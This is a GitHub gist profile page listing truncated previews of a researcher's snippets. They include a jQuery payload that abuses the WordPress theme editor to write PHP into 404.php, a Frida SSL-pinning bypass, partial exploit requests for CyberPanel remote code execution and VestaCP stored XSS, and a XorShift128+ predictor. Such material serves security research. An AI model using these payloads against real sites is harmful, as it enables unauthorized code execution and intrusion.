Skip to content

Instantly share code, notes, and snippets.

View numanturle's full-sized avatar
🕳️

numan numanturle

🕳️
303 followers · 191 following
View GitHub Profile
@numanturle
numanturle / 1.cpp
Created December 19, 2020 00:57
#include <windows.h>
#include <iostream>
using namespace std;
//https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-sleepex
//https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-sleep
//75BF3C9A | E8 11000000 | call <kernelbase.SleepEx> |
int main() {
for (int i = 0; i < 5; i++) {
cout << i << "\n";
cout << "Uyku Basliyor";
@numanturle
numanturle / gist:e38ab0c6ad13aec9398ab033d0194d47
Created December 22, 2020 14:36
wordpress
jQuery.get("/wordpress/wp-admin/theme-editor.php?file=404.php",function(data){
var parsed = jQuery.parseHTML(data);
var noncem = jQuery("#nonce").val();
var themem = jQuery("#theme").val();
jQuery.post( "/wordpress/wp-admin/admin-ajax.php", { nonce: noncem, newcontent: "<?php phpinfo(); ?>",action: "edit-theme-plugin-file",theme: themem, file:"404.php" } );
jQuery.get("/wordpress/wp-content/themes/"+themem+"/404.php");
@numanturle
numanturle / big.php
Created December 29, 2020 15:29
big file
$handle = fopen("big.json", "r");
if ($handle) {
while (($line = fgets($handle)) !== false) {
// process the line read.
}
fclose($handle);
} else {
// error opening the file.
}
@numanturle
numanturle / frida_multiple_unpinning.js
Created January 10, 2021 00:46 — forked from akabe1/frida_multiple_unpinning.js
Another Android ssl certificate pinning bypass for various methods
/* Android ssl certificate pinning bypass script for various methods
by Maurizio Siddu
Run with:
frida -U -f [APP_ID] -l frida_multiple_unpinning.js --no-pause
*/
setTimeout(function() {
Java.perform(function () {
console.log('');
@numanturle
numanturle / CyberPanel - Authenticated Remote Code Execution - 1.md
Created March 7, 2021 16:56
CyberPanel - Authenticated Remote Code Execution - 1

HTTP REQUEST

POST /websites/addNewCron HTTP/1.1
Host: HOST:8090
Connection: close
Content-Length: 137
Accept: application/json, text/plain, */*
DNT: 1
X-CSRFToken: MnbiTTzojyQye27IpaGyqfhsocdfYbtW3zVL3eI7gZk7dGmuxEYApZM2Pp59eJQZ
User-Agent: Mozilla/5.0
@numanturle
numanturle / CyberPanel - Authenticated Remote Code Execution - 2.md
Last active January 9, 2023 21:19 
POST /filemanager/controller HTTP/1.1
Host: HOST:8090
Connection: close
Content-Length: 141
Accept: application/json, text/plain, */*
DNT: 1
X-CSRFToken: MnbiTTzojyQye27IpaGyqfhsocdfYbtW3zVL3eI7gZk7dGmuxEYApZM2Pp59eJQZ
User-Agent: Mozilla/5.0 
Content-Type: application/json;charset=UTF-8
@numanturle
numanturle / CyberPanel - Authenticated Remote Code Execution - 3.md
Created March 7, 2021 17:47 
POST /filemanager/controller HTTP/1.1
Host: HOST:8090
Connection: close
Content-Length: 175
Accept: application/json, text/plain, */*
DNT: 1
X-CSRFToken: MnbiTTzojyQye27IpaGyqfhsocdfYbtW3zVL3eI7gZk7dGmuxEYApZM2Pp59eJQZ
User-Agent: Mozilla/5.0 
Content-Type: application/json;charset=UTF-8
@numanturle
numanturle / VestaCP_Stored_Xss.md
Created March 7, 2021 23:23 
POST /add/ip/ HTTP/1.1
Host: 89.252.140.31:8083
Connection: close
Content-Length: 165
Cache-Control: max-age=0
Origin: https://89.252.140.31:8083
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
@numanturle
numanturle / frida.py
Created June 13, 2021 12:31
AES encryption frida
import time
import frida
import json
enc_cipher_hashcodes = [] #cipher objects with Cipher.ENCRYPT_MODE will be stored here
dec_cipher_hashcodes = [] #cipher objects with Cipher.ENCRYPT_MODE will be stored here
def my_message_handler(message, payload):
#mainly printing the data sent from the js code, and managing the cipher objects according to their operation mode
if message["type"] == "send":
@numanturle
numanturle / sed.py
Created July 4, 2021 08:37
sed.py
import argparse
import struct
from decimal import *
import os
from z3 import *
MAX_UNUSED_THREADS = 2
# Calculates xs128p (XorShift128Plus)